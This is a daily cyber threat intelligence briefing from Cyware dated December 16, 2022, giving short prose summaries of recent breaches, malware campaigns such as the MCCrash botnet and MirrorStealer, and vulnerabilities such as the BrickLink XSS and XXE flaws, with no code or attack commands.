Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Dec 16, 2022

Are your devices operating on default credentials? Microsoft has reported about a new botnet threat known as MCCrash that can take over such devices and also boasts a unique spreading mechanism. While the botnet malware can exit from the infected system, it could still persist on unmanaged IoT devices in the network. The world’s largest online community of LEGO fans was found plagued by two vulnerabilities, exposing it to Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) attacks.

Beware of fake Windows installers! Recently, the government of Ukraine was targeted with malicious ISO files camouflaged as Windows 10 updates. The attack seems like an espionage attempt instead of some financially-motivated intrusion.

For detailed Cyber Threat Intel, click ‘Read More.’

Top Breaches Reported in the Last 24 Hours

Crypto firm suffered third-party incident

Crypto exchange Gemini was targeted in a phishing attack after hackers successfully extracted the personal information of its customers from an unnamed third-party vendor. Security experts found phone numbers and email addresses of its 5.7 million users available for sale on different hacker forums. Customers’ account data and its systems have not been impacted.

**Potential breach at Social Blade **

Cybercriminals illegally entered the network of social media analytics platform Social Blade to pilfer critical data which was then put on sale on the dark web. It is assumed that the hackers abused a bug on its website to access the database. Hackers may have stolen email addresses, password hashes, Client IDs, tokens for business API users, and other non-personal and internal data.

Top Malware Reported in the Last 24 Hours

New Agenda ransomware sample

Trend Micro security analysts spotted a sample of the Agenda ransomware written in Rust. The actors seem to have modified the previous ransomware version, originally written in the Go language, for intended victims. Moreover, the Rust variant has also been using intermittent encryption tactics for faster encryption and detection evasion.

MCCrash - New botnet in town

Microsoft unearthed MCCrash, a cross-platform botnet, that is aimed at launching DDoS attacks against private Minecraft servers. The cluster of activity is being tracked as DEV-1028 by the researchers. MCCrash breaks through default credentials on internet-exposed SSH-enabled devices. It is being dropped via fake software downloads by Windows users, however, it can propagate to infect Linux-based devices as well.

Fake Windows 10 installers

The UNC4166 threat group recently targeted Ukrainian government entities via trojanized ISO files imitating legitimate Windows 10 installers. After compromising machines, these files drop several backdoors, such as Stowaway, Beacon, and Sparepart for persistence. The malware are capable of transferring files, stealing records, and executing arbitrary commands.

MirrorStealer by MirrorFace

Hacker group MirrorFace has been targeting Japanese politicians with a new custom malware, dubbed MirrorStealer, for weeks, revealed cybersecurity firm ESET. The info-stealing malware payload was used along with the group’s signature backdoor, LODEINFO. The latter would help in communicating with a C2 server belonging to APT10 infrastructure.

Top Vulnerabilities Reported in the Last 24 Hours

API bugs in LEGO website

Two API security flaws were found in the biggest online LEGO fans community, BrickLink, which has over a million registered members. The first flaw was an XSS bug that can let an attacker execute ill-intent code using a specially crafted link. The second flaw was an XML External Entity (XXE) injection bug leading to an SSRF attack and the leak of AWS EC2 tokens for the server.

Updates for Siemens and Schneider Electric out

Siemens and Schneider Electric issued patches for more than 140 flaws in their December 2022 Patch Tuesday release. An advisory by Seimens discusses patches for more than 80 OpenSSL and OpenSSH vulnerabilities in Scalance X-200RNA switches. In Schneider Electric, a key advisory patches four critical and high-severity bugs in its APC Easy UPS online monitoring software.

Related Threat Briefings